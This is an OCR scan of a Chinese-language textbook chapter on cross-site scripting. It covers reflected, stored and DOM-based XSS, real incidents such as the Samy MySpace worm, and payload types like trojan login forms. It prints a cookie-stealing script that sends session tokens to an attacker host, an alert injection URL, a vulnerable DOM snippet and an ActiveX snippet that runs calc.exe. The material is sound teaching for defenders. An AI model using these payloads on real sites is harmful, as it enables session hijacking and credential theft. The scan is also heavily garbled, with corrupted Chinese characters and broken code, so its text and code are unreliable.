数 的 内 容 可 用 任何 返回 给 浏览 器 的 数据 蔡 代 ， 其 次 ， 无 论 服 务 器 端 应 
用 程序 如 何 处 理 这 些 数据 (如 果 有 ) ， 都 无 法 阻止 提交 JavaScript 代 

E, 一旦 错误 页 面 在 浏览 器 中 显示 ， 这 些 代码 就 会 执行 。 


尝试 访问 


http://mdsec.net/error/5/ 


于 注解 如 果 在 Intemnet Explorer 中 尝试 这 样 的 示例 ， 弹 出 窗口 


可 能 无 法 显示 ， 浏 览 右 可 能 会 显示 以 下 消息 : “为 帮助 阻止 跨 站 点 
HÆ, Internet Explorer 已 修改 此 页 面 。” 这 是 因为 最 狐 版 本 的 Internet 
Explorer 包 含 一 个 旨 在 帮助 用 户 防 范 反 射 型 XSS 漏 洞 的 内 置 机 制 。 如 
果 要 测试 这 些 示 例 ， 可 以 答 试 使 用 其 他 未 使 用 这 种 保护 机 制 的 浏 唤 
癸 ， 或 者 通过 以 下 方式 禁用 XSS 饰 选 句 : “工具 ”一 “Internet 选 项 ” 

-~“ 安 全 ”~“ 自 定义 级 别 ”， 在 “启用 XSS 筛 选 器 ”下 选择 “禁用 ”。 我 
We 分 讨论 XSS 筛 选 器 的 工作 机 制 ， 以 及 避 开 这 种 得 

} 


在 现实 世界 的 Web 应 用 程序 中 存在 的 XSS 漏 洞 ， 有 近 75% 的 漏洞 属 
于 这 种 简单 的 XSS bug。 由 于 利用 这 种 调 洞 需要 设计 一 个 包 仍 典 入 式 
JavaScript 代 码 的 请 求 ， 随 后 这 些 代码 又 被 反射 到 任何 提出 请 求 的 用 
户 ， 因 而 它 被 称 作 反射 型 XSS。 攻 击 有 效 载 傈 分 别 通过 一 个 单独 的 请 
求 与 啊 应 进行 传送 和 执行 。 为 此 ， 有 时 它 也 被 称 为 一 阶 XSS 。 

利用 漏洞 

下 文 将 会 介绍 ， 利 用 XSS 漏 洞 攻 击 应 用 程序 其 他 用 户 的 方式 有 很 
多 种 。 最 简单 的 一 种 攻击 ， 也 是 我 们 第 用 于 说 明 XSS 漏 洞 潜在 影响 的 
一 种 攻击 ， 可 导致 攻击 者 截获 通过 验证 的 用 户 的 会 话 令 牌 。 动 持 用 户 
的 会 话 后 ， 攻 击 者 就 可 以 访问 该 用 户 经 授权 访问 的 所 有 数据 和 功能 
(参见 第 7 章 ) 。 实 施 这 种 攻击 的 步骤 如 图 12-3 所 示 。 


应 用 程序 


5. 攻击 者 的 JavaScript Semel Teele a es ” 

在 用 户 的 浏览 器 中 执行 = 2. 攻击 者 将 他 自己 淮 备 的 URL 提 交 给 客户 “多 
a 6. 用 户 的 浏览 器 向 攻击 者 发 送 会 话 令 牌 “ya 
用 户 攻击 者 


图 12-3 ”反射 型 XSS 攻 击 的 实施 步 又 


(1) 用 户 正常 登录 应 用 程序 ， 得 到 一 个 包含 会 话 令 牌 的 cookie: 
Set-Cookie: SessId=184a9138ed37374201a4c9672362f12459c2a65249153 


(2) 攻击 者 通过 某 种 方法 (详情 见 下 文 ) 向 用 户 提交 以 下 URL: 


hitp://mdsec.net/error/S/Error.ashx?message=<script>vaer+i=new-+Image 


7+i.sre="“http://mdattacker.net/"t2bdocument .cockie; </script> 
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(3) 用 户 从 应 用 程序 中 请 求 攻击 者 传送 给 他 们 的 URL 。 

(4) 服务 器 响应 用 户 的 请 求 。 由 于 应 用 程序 中 存在 XSS 漏 洞 ， 响 
应 中 包含 攻击 者 创建 的 JavaScript 代码 。 

(5) 用户 浏览 器 收 到 攻击 者 的 JavaScript 代 码 ， 像 执行 从 应 用 程 
序 收 到 的 其 他 代码 一 样 ， 浏 贤 器 执行 这 段 代 码 。 

(6) 攻击 者 创建 的 恶意 JavaScript 代 码 为 : 


i.srce="http://mdattacker.net/*+document.cookie; 


Var i=new image; 


这 段 代 码 可 让 用 户 浏览 器 向 mdattackernet (攻击 者 拥有 的 一 个 
域 ) 提出 一 个 请 求 。 请 求 中 包含 用 户 访问 应 用 程序 的 当前 会 话 令 牌 : 


GET /sessld=184a9138ed37374201a4c9672362£12459c2a652491a3 HITP/1.1 


Eost: mdattacker.net 
(7) 攻击 者 监控 访问 mdattackernet 的 请 求 并 收 到 用 户 的 请 求 。 攻 


击 者 使 用 堆 获 的 令 牌 支 持 用 户 的 会 话 ， 从 而 访问 该 用 户 的 个 人 信息 ， 
并 “代表 ”该 用 户 执 行 任意 操作 。 


T 注解 第 6 章 已 经 介绍 过 ， 一 些 应 用 程序 保存 一 个 持久 性 
cookie， 以 在 用 户 每 次 访问 时 重新 对 其 进行 有 效 验 证 ， 例 如 ， 执 


行 “ 记 住 我 功能。 这 时 ， 就 没有 必要 执行 上 述 过 程 中 的 第 一 个 步 
又 。 即 使 目标 用 户 并 未 处 于 活动 状态 或 登录 应 用 程序 ， 攻 击 者 仍然 
能 够 成 功 实现 目标 。 为 此 ， 以 这 种 方式 使 用 cookie 的 应 用 程序 更 易 
受到 XSS 漏 洞 的 影响 。 


完成 上 述 步 骤 后 ， 读 者 可 能 会 心 存 疑惑 : 如 果 攻 击 者 能 够 诱 使 用 
户 访 问 他 选择 的 URL， 那 么 他 为 什么 还 要 费 这 么 大 力气 通过 应 用 程序 
中 的 XSS 漏 洞 传 送 目 己 的 恶意 JavaScript 代 码 昵 ? 为 什么 他 不 在 
mdattackernet 上 保存 一 段 恶 意 脚本 ， 并 回 用 户 传送 一 个 直接 指 回 这 段 
脚本 的 链接 呢 ? 这 段 脚本 不 是 可 以 和 上 例 中 的 脚本 一 样 执行 吗 ? 

要 了 解 攻击 者 为 什么 需要 利用 XSS 漏 洞 ， 需 要 回顾 第 3 章 介绍 的 同 
源 策 略 。 为 防止 不 同 域 在 用 户 浏 顺 右 中 彼此 干扰 ， 浏 览 恬 对 从 不 同 来 
源 (Sak) 收 到 的 内 容 进 行 隔离 。 攻 击 者 的 目的 不 是 单纯 地 执行 任意 脚 
本 ， 而 是 截获 用 户 的 会 话 令 牌 。 浏 览 辟 不 允许 任何 上 日 有 脚本 访问 一 个 
站 点 的 cookie， 人 和 否则， 会话 驶 很 容易 被动 持 。 而 且 ， 只 有 发 布 cookie 的 
站 点 能 够 访问 这 些 cookie: 仅 在 返回 发 布 站 点 的 HITP 请 求 中 提交 cookie 
; 只 有 通过 该 站 点 返回 的 页 面 所 包含 或 加 载 的 JavaScript 才 能 访问 
cookie。 因 此 ， 如 果 mdattacker.net 上 的 一 段 脚 本 查询 document.cookie， 
它 将 无 法 获得 mdsec.net 发 布 的 cookie， 支 持 攻击 也 不 会 成 功 。 

就 用 户 的 浏览 器 而 言 ， 利 用 XSS 漏 润 的 攻击 之 所 以 取得 成 功 ， 是 
因为 攻击 者 的 恶意 JavaScript 是 由 mdsec.net 送 交 给 它 的 。 当 用 户 请 求 攻 
A ASURLAY , Xua az |e] http://mdsec.net/error/5/Error.ashxte 20 — “Pi 
求 ， 然 后 应 用 程序 返回 一 个 包含 一 段 JavaScript 的 页 面 。 和 从 mdsec.net 
收 到 的 任何 JavaScript 一 样 ， 浏 览 絮 执行 这 段 肢 本， 因为 用 户 信任 
mdsec.net。 这 也 就 是 为 何 攻 击 的 脚本 能 够 访问 mdsec.net 发 布 的 cookie 


的 原因 ， 虽 然 它 实际 来 目 其 他 地 方 。 这 也 是 为 何 该 漏洞 被 称 作 路 站 点 
脚本 的 原因 。 


12.1.2 型 XSS 漏 浙 


另 一 种 常见 的 XSS 漏 洞 叫做 保存 型 跨 站 点 脚本 。 如 果 一 名 用 户 提 
交 的 数据 被 保存 在 应 用 程序 中 (通常 保存 在 一 个 后 端 数据 库 中 ) ， 然 
后 不 经 适当 过 滤 或 净化 就 显示 给 其 他 用 户 ， 此 时 就 会 出 现 这 种 漏洞 。 

在 支持 终端 用 户 交互 的 应 用 程序 中 ， 或 者 在 具有 管理 权限 的 员工 
访问 同一 个 应 用 程序 中 的 用 户 记录 和 数据 的 应 用 程序 中 ， 保 存 型 XSS 
漏洞 很 常见 。 例 如 ， 以 一 个 拍卖 应 用 程序 为 例 ， 它 允许 买 家 提出 与 某 
件 商品 有 关 的 问题 ， 然 后 由 卖家 回答 。 如 果 一 名 用 户 能 够 提出 一 个 包 
合 柑 入 式 JavaScript 的 问题 ， 而 且 应 用 程序 并 不 过 滤 或 净化 这 个 
JavaScript， 那 么 攻击 者 就 可 以 提出 一 个 专门 设计 的 问题 ， 在 任何 查看 
该 问题 的 用 户 (包括 卖家 和 潜在 的 买 家 ) 的 浏览 器 中 执行 任意 脚本 。 
在 这 种 情况 下 ， 攻 击 者 就 可 让 不 知情 的 用 户 去 竞标 一 件 他 不 想 要 的 商 
品 ; 或 者 让 一 位 卖家 接受 他 提出 的 低 价 ， 结 束 竞 标 。 

一 般 情 况 下 ， 利 用 保存 型 XSS 漏 洞 的 攻击 至 少 需要 向 应 用 程序 提 
出 两 个 请 求 。 攻 击 者 在 第 一 个 请 求 中 传送 一 些 专门 设计 的 数据 ， 其 中 
包含 恶意 代码 ， 应 用 程序 接受 并 保存 这 些 数据 。 在 第 二 个 请 求 中 ， 一 
名 受害 者 查看 某 个 包含 攻击 者 的 数据 的 页 面 ， 这 时 恶意 代码 开始 执 
行 。 为 此 ， 这 种 漏洞 有 时 也 叫做 二 阶 跨 站 点 脚本 。 (在 这 个 示例 中 ， 
使 用 XSS 实 际 上 并 不 准确 ， 因 为 攻击 中 没有 跨 站 点 元 素 。 但 由 于 这 个 
名 称 被 人 们 广泛 使 用 ， 因 此 我 们 在 这 里 仍然 沿用 它 。) 

图 12-4 说 明了 一 名 攻击 者 如 何 利 用 保存 型 XSS 漏 洞 ， 实 施 上 述 利 
用 反射 型 XSS 漏 洞 实施 的 相同 会 话 动 持 攻击 。 


5. 攻击 者 的 JavaSeript ie an aw 
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用 户 攻击 者 
图 12-4 保存 型 XSS 漏 洞 的 实施 步 又 


尝试 访问 


本 示例 包含 一 项 搜索 功能 ， 可 用 于 显示 当前 用 户 输 入 的 查询 ， 


以 及 其 他 用 户 最 近 输 入 的 查询 列表 。 由 于 查询 将 按 原样 显示 ， 应 用 
程序 将 易于 受到 反射 型 和 保存 型 XSS 攻 击 。 看 看 是 否 能 够 找到 这 两 
种 漏洞 。 

http://mdsec.net/search/11/ 


反射 型 与 保存 型 XSS 攻 击 在 实施 步骤 上 存在 两 个 重要 的 区 别 ， 这 
也 使 得 后 者 往往 造成 更 大 的 安全 威胁 。 

上 首先， 在 反射 型 XSS 脚 本 攻击 中 ， 要 利用 一 个 漏洞 ， 攻 击 者 必须 
以 某 种 方式 诱 使 受害 者 访问 他 专门 设计 的 URL。 而 保存 型 XSS 脚 本 攻 
击 则 没有 这 种 要 求 。 在 应 用 程序 中 展开 攻击 后 ， 攻 击 者 只 需要 等 竺 受 
害 者 浏 贤 已 被 攻破 的 页 面 或 功能 。 通 常 ， 这 个 页 面 是 一 个 正常 用 户 将 
会 主动 访问 的 常规 页 面 。 

其 次 ， 如 有 果 受 害 者 在 遭受 攻击 时 正在 使 用 应 用 程序 ， 攻 击 者 束 更 
容易 实现 其 利用 XSS 漏 洞 的 目的 。 例 如 ， 如 采用 户 当 前 正在 进行 会 
话 ， 那 么 攻击 者 就 可 以 劫持 这 个 会 话 。 在 反射 型 XSS 攻 击 中 ， 攻 击 者 
可 能 会 说 服用 户 登录 ， 然 后 单 击 他 们 提供 的 一 个 链接 ， 从 而 制造 这 种 
情况 。 或 者 他 可 能 会 部 署 一 个 永久 性 的 有 效 载 位 并 等 每 用 户 登 录 。 但 
征 ， 在 保存 型 XSS 攻 击 中 ， 攻 击 者 能 够 傈 证 ， 受 害 用 户 在 他 实施 攻击 
时 已 经 在 访问 应 用 程序 。 因 为 攻击 有 效 载 位 被 保存 在 用 户 目 主 访问 的 
一 个 应 用 程序 页 面 中 ， 所 以 ， 当 有 效 载 符 执行 时 ， 任 何 攻 击 受 害 者 都 
在 使 用 应 用 程序 。 而 且 ， 如 有 果 上 述 页 面 位 于 应 用 程序 通过 验证 的 区 域 
内 ， 那 么 那 时 攻击 受害 者 一 定 已 经 登录 。 

反射 型 与 保存 型 XSS 攻 击 之 间 的 这 些 区 别 意 味 痢 保 存 型 XSS 调 洞 
往往 会 给 应 用 程序 带 来 更 严重 的 安全 威胁 。 许 多 时 候 ， 攻 击 者 可 以 同 
应 用 程序 提交 一 些 专门 设计 的 数据 ， 然 后 等 竺 受害 者 访问 它们 。 如 采 
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反射 型 和 保存 型 XSS 漏 洞 都 表现 出 一 种 特殊 的 行为 模式 ， 其 中 应 
用 程序 提取 用 户 控制 的 数据 并 以 危险 的 方式 将 这 些 数据 返回 给 用 户 。 
第 三 类 XSS 漏 洞 并 不 具有 这 种 特点 。 在 这 种 漏洞 中 ， 攻 击 者 的 
JavaScript 通 过 以 下 过 程 得 以 执行 。 

口 用 户 请 求 一 个 经 过 专门 设计 的 URL， 它 由 攻击 者 提交 ， 且 其 中 
BERA JavaScript ° 

口服 务 吉 的 啊 应 中 并 不 以 任何 形式 包含 攻击 者 的 脚本 。 

口 当 用 户 的 浏览 器 处 理 这 个 响应 时 ， 上 壕 脚 本 得 以 处 理 。 

这 一 系列 事件 如 何 发 生 呢 ? 由 于 客户 端 JavaScript 可 以 访问 浏览 需 
的 文本 对 象 模型 (Document Object Model, DOM) ， 因 此 它 能 够 决定 
用 于 加 载 当 前 页 面 的 URL。 由 应 用 程序 发 布 的 一 段 脚 本 可 以 从 URL 中 
提取 数据 ， 对 这 些 数据 进行 处 理 ， 然 后 用 它 动 态 更 新 页 面 的 内 容 。 如 
果 这 样 ， 应 用 程序 就 可 能 易于 受到 基于 DOM 的 XSS 攻 击 。 

回 到 前 面 的 反射 型 XSS 漏 洞 中 的 示例 ， 其 中 服务 器 端 应 用 程序 将 
一 个 URL 参 数值 复制 到 一 条 错误 消息 中 。 另 一 种 实现 相同 功能 的 办 法 
是 由 应 用 程序 每 次 返回 相同 的 静态 HIML， 并 使 用 客户 端 JavaScript 动 
态 生成 消息 内 容 。 

例如 ， 假 设 应 用 程序 返回 的 错误 页 面包 含 以 下 脚本 : 


<script> 


var url = document. location; 

url = unescape({uri); 

var message = url.substring({url.incexOf('message=') + 8, url 
. Length) ; 

document.write (message); 


</script> 


这 段 脚 本 解析 URL， 提 取出 message 参 数 的 值 ， 并 把 这 个 值 写 入 页 
面 的 HTML 源 代码 中 。 如 采 按 开发 者 预想 的 方式 调用 ， 它 可 以 和 前 面 
的 示例 中 一 样 ， 用 于 创建 错误 消 轧 。 但 是 ， 如 果 攻 击 者 设计 出 一 个 
URL， 并 以 JavaScript 代 码 作为 message 参 数 ， 那 么 这 段 代码 将 被 动态 
写 入 页 面 中 ， 并 像 服 务 需 返回 代码 一 样 得 以 执行 。 在 这 个 示例 中 ， 前 
Ha 中 利用 反射 型 XSS 漏 洞 的 同一 个 URL 也 可 用 于 生成 一 个 对 话 
E: 


http://mdsec.net/error/18/Error.ashx?messaqe=<script>alert('xss')</script> 


尝试 访问 


http://mdsec.net/error/18/ 


利用 基于 DOM 的 XSS 漏 洞 的 过 程 如 图 12-5 所 示 。 


2. 攻击 者 将 他 自己 准备 的 URL .回馈 给 用 户 wae 
5. 攻击 者 的 URL 由 JavaScript em oA eiria a n e 
AR, SIRIH a OMAR > D 
用 户 攻击 者 


图 12-5 ”基于 DOM 的 XSS 攻 击 的 实施 步 又 


与 保存 型 XSS 漏 洞 相 比 ， 基 于 DOM 的 XSS 漏 洞 与 反射 型 XSS 漏 洞 
有 更 大 的 相似 性 。 利用 它们 通常 需要 攻击 者 户 使 一 名 用 户 访问 一 个 包 
含 恶意 代码 的 专门 设计 的 UREL， 并 由 服务 器 响应 那个 确保 得 恶意 代码 
得 以 执行 的 特殊 请 求 。 但 是 ， 在 利用 反射 型 与 基于 DOM 的 XSS 漏 洞 的 
细节 方面 ， 还 存在 一 些 重要 的 差异 ，j 这 点 我 们 在 稍 后 讨论 。 


12.2 ”进行 中 的 XSS 


要 了 解 XSS 漏 洞 导致 的 严重 后 采 ， 有 必要 分 析 一 些 真实 的 XSS 攻 
击 示例 ， 这 有 助 于 我 们 了 解 XSS 攻 击 能 够 执行 的 各 种 恶意 操作 ， 以 及 
如 何 针 对 受害 者 实施 这 类 攻击 。 


12.2.1 ”真实 XSS 攻 击 


2010 年 ，Apache Foundation 被 攻击 者 利用 其 问题 追踪 应 用 程序 中 
的 漏洞 、 通 过 反射 型 XSS 攻 击 攻破 。 首 先 ， 攻 击 者 发 布 一 个 使 用 重 定 
器 服务 进行 模糊 处 理 的 链接 ， 该 链接 指 同 一 个 利用 上 述 XSS 漏 洞 获 取 
登录 用 户 的 会 话 令 牌 的 URL。 如 有 果 管 理 员 单 击 该 链接 ， 他 的 会 话 将 被 
攻破 ， 攻 击 者 将 获得 对 应 用 程序 的 管理 访问 权限 。 然 后 ， 攻 击 者 修改 
某 个 项 目的 设置 ， 将 该 项 目的 上 传 文件 夹 更 改 为 应 用 程序 的 Web 根 目 
录 中 的 可 执行 目录 。 随 后 ， 攻 击 者 疝 此 文件 夹 上 传 一 个 木马 登录 表 
单 ， 从 而 获取 特权 用 户 的 用 户 名 和 密码 。 通 过 这 种 方法 ， 攻 击 者 确定 
一 些 在 基础 架构 的 其 他 系统 中 重复 使 用 的 密码 ， 并 完全 攻破 这 些 系 
统 ， 将 攻击 范围 扩展 到 易 受 攻击 的 Web 应 用 程序 之 外 。 

有 天 此 次 攻击 的 详情 ， 请 参阅 以 下 URL: 


http://blogs.apache.org/infra/entry/apache org_04 09 2010 


2005 年 ， 发 现 社交 网 络 站 点 MySpace 易 于 受到 保存 型 XSS 攻 击 。 
虽然 MySpace 的 应 用 程序 实施 了 过 滤 ， 防 止 用 户 在 他 们 的 用 户 资 料 页 
面 艇 入 JavaScript 脚 本， 但 是 ， 一 位 名 叫 Samy 的 用 户 找到 了 一 种 避 开 这 
些 过 滤 的 方法 ， 并 在 用 户 资 料 页 面 中 插入 了 一 些 JavaScript 脚 本 。 如 果 
一 名 用 户 查 看 他 的 用 户 资 料 ， 这 段 脚本 就 会 执行 ， 导 致 受害 者 的 浏览 
句 执 行 各 种 操作 。 这 束 造 成 了 两 个 严重 后 果 : 首先 ， 它 把 Samy 加 为 受 
害 者 的 “朋友 ”， 其 次 ， 它 把 上 述 脚 本 复制 到 受害 者 自己 的 用 户 资 料 页 
面 中 ， 因 此 ， 任 何 查 看 受害 者 用 户 资 料 的 用 户 也 会 成 为 这 次 攻击 的 受 
害 者 。 结 果 ， 一 个 基于 XSS 的 蠕虫 在 因特网 上 迅速 扩散 ， 几 小 时 内 ， 
Samy 收 到 了 近 100 万 个 朋友 邀请 。 为 此 ，MySpace 被 迫 关闭 它 的 应 用 
人 
9 缺陷。 

有 关 此 次 攻击 的 详细 信息 ， 请 参阅 以 下 URL: 


http://namb.la/popular/tech.html 

当 收 件 人 查阅 电子 邮件 时 ， 邮 件 内 容 在 浏 唤 万 中 显示 ; Web 邮件 
应 用 程序 的 这 种 行为 本 吴 束 存在 着 保存 型 XSS 攻 击 风 险 。 电 子 邮 件 中 
可 能 包含 HTML 格 式 的 内 容 ， 因 此 应 用 程序 会 立即 将 第 三 方 HTML 复 
制 到 癌 用 户 显 示 的 页 面 中 。2009 年 ， 一 家 名 为 StrongWebmail 的 Web 由 p 
件 提 供 商 莫 赏 1 万 美元 ， 征 询 能 够 侵入 其 CEO 电 子 邮 件 的 黑客 。 最 终 ， 
墨客 在 该 Web 邮 件 应 用 程序 中 发 现 一 个 保存 型 XSS 漏 洞 ， 如 有 果 收 件 人 
查看 恶意 电子 邮件 ， 墨 客 就 可 以 执行 任意 JavaScript。 于 是 ， 墨 客 们 回 
该 CEO 发 送 了 一 份 恶意 电子 邮件 ， 攻 破 了 他 在 应 用 程序 上 的 会 话 ， 从 
而 最 得 了 筑 金 。 

有 关 此 次 攻击 的 详细 信息 ， 请 参阅 以 下 URL: 

http://blogs.zdnet.com/security/?p=3514 

2009 年 ，Twitter 成 为 了 两 个 XSS 里 虫 的 受害 者 ， 这 两 个 蠕虫 利用 
保存 型 XSS 漏 洞 在 Twitter 用 户 间 进 行 传播 ， 并 发 布 推 文 来 宰 传 蠕虫 作 
者 的 网 站 。 人 和 人们 还 在 Twitter 中 发 现 各 种 基于 DOM 的 XSS 漏 洞 ， 这 主要 
是 因为 它 在 客户 疹 大 量 使 用 类 似 于 Ajax 的 代码 所 致 。 

有 关 这 些 漏洞 的 详细 信息 ， 请 参阅 以 下 URL: 

www.cgisecurity.com/2009/04/two-xss-worms-slam-twitter.html 

http://blog.mindedsecurity.com/2010/09/twitter-domxss-wrong-fix- 
andsomething.html 


12.2.2”XSS 攻 击 有 效 载荷 


迄今 为 止 ， 我 们 已 经 重点 分 析 了 典型 的 XSS 攻 击 有 效 载 何 ， 如 和 截 
获 一 名 受害 者 的 会 话 令 牌 ， 支 持 他 的 会 话 ， 进 而 “作为 ”受害 者 使 用 应 
用 程序 ， 执 行 任 意 操作 并 占有 该 用 户 的 账户 。 实 际 上 ， 还 有 其 他 大 量 
的 攻击 有 效 载 倚 可 通过 任何 类 型 的 XSS 漏 洞 传送 。 

1. 虚拟 置 

这 种 攻击 需要 在 一 个 Web 应 用 程序 页 面 注 入 恶意 数据 ， 从 而 回应 
用 程序 用 户 传送 误导 性 信息 。 它 包括 简单 同 站 点 中 注入 HTML 标 记 ， 
或 者 使 用 脚本 (有 时 保存 在 外 部 服务 器 上 ) 在 站 点 中 注入 精心 设计 的 
内 容 和 导航 。 这 种 攻击 被 称 为 虚拟 置换 (virtual defacement) ， 因 为 攻 
击 者 实际 上 并 没有 修改 保存 在 目标 Web 服 务 孝 上 的 内 容 ， 而 是 利用 应 
用 程序 处 理 并 显示 用 户 提 区 的 输入 方面 的 缺陷 实现 置换 。 

除 造 成 无 天 紧要 的 损害 外 ， 这 种 攻击 也 可 用 于 严重 的 犯罪 活动 
中 。 一 个 专门 设计 的 置换 ， 如 果 以 可 信 的 方式 传送 给 适当 的 接受 者 ， 


可 能 会 被 新 闻 媒 体 报导 ， 对 人 们 的 行为 、 股 票 价格 等 造成 重大 影响 ， 
从 而 帮助 攻击 者 从 中 获得 经 济 利益 ， 如 图 12-6 所 示 。 
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图 12-6 一 次 利用 XSS 漏 洞 的 虚拟 置换 攻击 


2. 注入 木马 功能 

这 种 攻击 造成 的 后 果 远 比 虚 拟 置换 严重 ， 它 在 易 受 攻击 的 应 用 程 
序 中 注入 实际 运行 的 功能 ， 则 在 欺骗 终端 用 户 执行 某 种 有 害 操 作 (如 
输入 敏感 数据 ) ， 随 后 将 它们 传送 给 攻击 者 。 

在 一 个 明显 的 攻击 中 ， 攻 击 者 注入 的 功能 同 用 户 显 示 一 个 木马 登 
录 表 单 ， 要 求 他 们 辣 攻 击 者 控制 的 服务 器 提交 他 们 上 自己 的 证 书 。 如 果 
由 技巧 熟练 的 攻击 者 实施 ， 这 种 攻击 还 允许 用 户 无 颖 登录 到 真正 的 应 
用 程序 中 ， 确 保 他 们 不 会 发 觉 访 问 过 程 中 的 任何 反常 情况 。 然 后 ， 攻 
击 者 天 可 以 目 由 使 用 受害 者 的 证 书 实现 自己 的 目的 。 这 种 类 型 的 有 效 
载 傈 非常 适 于 用 在 钓鱼 攻击 中 ， 辐 用户 传送 一 个 经 过 专门 设计 、 连 接 
可 信 应 用 程序 的 URL， 并 要 求 他 们 正常 登录 以 访问 这 个 URL 。 

男 一 种 明显 的 攻击 是 以 某 种 有 吸引 力 的 条 件 为 诱 钥 ， 要 求 用 户 输 
入 他 们 的 信用 卡 信息 。 例 如 ， 图 12-7 是 一 个 由 Jim Ley 设 计 的 概念 验证 
攻击 ， 它 利用 了 2004 年 在 Google 中 发 现 的 一 种 反射 型 XSS 漏 润 。 
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图 12-7 一 次 注入 木马 功能 的 反射 型 XSS 攻 击 


由 于 这 些 攻击 中 的 URL 指 癌 真 实 应 用 程序 的 可 信 域 名 ， 如 采 在 必 
要 时 使 用 有 效 的 SSL 证 书 ， 它 们 就 比 纯粹 的 钓鱼 Web 站 点 更 有 可 能 说 服 
受害 者 提交 敏感 信息 ; 后 者 通常 位 于 另 一 个 域 中 ， 而 且 只 是 克隆 目标 
Web 站 点 的 内 容 。 

3. 诱 使 用 户 执行 操作 

如 有 果 攻 击 者 动 持 受害 者 的 会 话 ， 那 么 他 就 可 以 “作为 ”该 用 户 使 用 
应 用 程序 ， 并 代表 这 名 用 户 执 行 任何 操作 。 但 是 ， 这 种 执行 任意 操作 
的 方法 并 不 总 能 达到 想到 的 目的 。 它 和 要 求 攻击 者 监控 他 们 目 己 的 服务 
器 ， 看 其 古 否 收 到 被 攻破 的 用 户 的 会 话 令 脾 ， 而 且 ， 它 还 要 求 他 们 代 
表 每 一 名 用 户 执 行 相关 操作 。 如 琳 要 癌 许 多 用 户 实 施 攻 击 ， 这 种 方法 
并 不 可 行 。 而 且 ， 它 在 应 用 程序 的 日 志 中 留 下 相当 明显 的 汇 迹 ， 用 户 
在 调查 过 程 中 利用 它 可 迅速 确定 执行 未 授权 操作 的 计算 机 。 

如 时 攻击 者 想 要 代表 每 位 被 攻破 的 用 户 执行 一 组 特殊 的 操作 ， 束 
可 以 采用 另 一 种 却 持 会 话 的 方法 ， 即 利用 攻击 有 效 载 谷 脚 本 执行 操 
作 。 如 有 果 攻 击 者 想 要 执行 某 个 需要 管理 权限 的 操作 ， 如 修改 他 控制 的 
一 个 账户 的 权限 ， 这 种 方法 特别 有 用 。 由 于 用 户 众 多 ， 要 动 持 每 名 用 


户 的 会 话 并 确定 其 是 否 为 管理 员 ， 可 能 需要 付出 极 大 的 努力 。 一 种 更 

加 有 效 的 方法 是 ， 诱 使 每 个 被 攻破 的 用 户 尝试 升级 攻击 者 账户 的 权 

限 。 大 多 数 尝试 都 会 失败 ， 但 如 果 一 个 管理 用 户 被 攻破 ， 攻 击 者 就 能 

° 我 们 将 在 13.1.1 季 说明 各 种 诱 使 其 他 用 户 执 行 操 
y y o 
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示例 ; TAY, CHA PP Oe er BY DA Ne TR PBT OR 
授权 操作 的 严重 性 。 这 种 攻击 利用 一 系列 采用 Ajax 技术 的 复杂 请 求 

(如 第 3 章 所 述 ) 来 执行 传播 蠕虫 所 需 的 各 种 操作 。 

如 果 攻 击 者 的 主要 目标 为 应 用 程序 ， 并 且 和 希望 在 攻击 时 尽 可 能 地 
保持 隐秘 ， 他 就 可 以 利用 这 种 类 型 的 XSS 攻 击 有 效 载 倍 让 其 他 用 户 执 
行 他 选择 的 、 针 对 应 用 程序 的 恶意 操作 。 例 如 ， 攻 击 者 可 以 促使 其 他 
用 户 利用 一 个 SQL 注入 漏洞 在 数据 库 的 用 户 账户 表 中 添加 一 个 新 的 管 
理 员 用 户 。 然 后 ， 攻 击 者 加 可 以 控制 这 个 新 账户 ， 通 过 它 执行 恶 意 控 
VE; 但 是 ， 任 何 对 应 用 程序 日 志 的 调查 结论 却 将 怀疑 对 象 指 回 这 名 新 
建 的 用 户 。 

4. 利用 信任 关系 

上 文 已 经 介绍 了 可 被 XSS 利 用 的 一 种 重要 的 信任 关系 : 浏 贤 絮 信 
任 由 发 布 cookie 的 Web 站 点 提交 的 JavaScript。 有 了 时， 在 XSS 攻 击 中 还 可 
以 利用 其 他 一 些 信任 关系 。 

口 如 果 应 用 程序 采用 激活 自动 完成 功能 的 表单 ， 由 应 用 程序 提交 
的 JavaScript 就 可 以 截获 任何 以 前 输入 的 、 用 户 浏 览 絮 保存 在 目 动 完成 
缓存 中 的 数据 。 通 过 示例 化 相关 表单 ， 等 待 浏览 器 自动 完成 尼 的 内 
容 ， 然 后 查询 表单 字段 值 ， 上 壕 JavaScript 脚 本 就 能 够 久 取 这 些 数 据 并 
将 其 传送 至 攻击 者 的 服务 器 。 这 种 攻击 比 注入 木马 功能 更 加 强大 ， 
为 它 不 需要 用 户 执行 任何 操作 束 可 以 截获 敏感 数据 。 

口 一些 Web 应 用 程序 推荐 或 要 求 用 户 把 其 域名 添加 到 浏 蜗 器 的 “可 
信 站 点 ”区 域内 。 这 种 要 求 几乎 总 会 造成 不 利 影响 ， 并 意味 着 攻击 者 可 
以 利用 任何 XSS 类 型 的 漏洞 在 受害 用 户 的 计算 机 上 执行 任意 代码 。 例 
如 ， 如 果 一 个 站 点 在 Internet Explorer 的 可 信 站 点 区 域内 运行 ， 那 么 注 
入 以 下 代码 将 会 在 用 户 的 计算 机 上 启动 Windows 计 算 絮 程序 。 


<script> 


var o = new ActivexXObject ('WScript.shell'); 
o.Run('calc.exe'); 


</script> 


口 Web 应 用 程序 通常 采用 包含 强大 方法 的 ActiveX 控 件 (请 参阅 第 
13 章 ) 。 一 些 应 用 程序 在 该 控件 内 核实 调用 的 Web 页 面 确 实 属 于 正确 
的 Web 站 点 ， 力 求 防止 第 三 方 滥用 这 种 控件 。 在 这 种 情况 下 ， 通 过 
XSS 攻 击 仍然 可 以 滥用 这 个 控件 ， 因 为 这 时 调用 的 代码 可 以 通过 控件 
实施 信任 检查 。 


号 错误 观点 “钓鱼 与 XSS 攻 击 只 会 影响 公众 因特网 上 的 应 用 


程序 。” 
XsS 漏 洞 可 以 影响 任何 类 型 的 eb 应 用 程序 ， 通 过 一 封 群发 电 
子 邮件 传送 的 针对 内 联网 应 用 程序 的 攻击 可 以 利用 两 种 形式 的 信任 


关系 。 首 先 ， 在 同事 之 间 传 送 的 内 部 电子 邮件 利用 他 们 之 间 的 社区 
信任 关系 。 其 次 ， 与 公众 因特网 上 的 Web 服 务 器 相 比 ， 受 害 者 的 浏 
览 需 往往 会 更 加 信任 企业 Web 服 务 硕 。 例 如 ， 如 有 果 一 合计 算 机 属于 
企业 域 的 一 部 分 ， 那 么 在 访问 内 联网 应 用 程序 时 ， 浏 览 硕 会 默认 使 
用 较 低 的 安全 级 别 。 


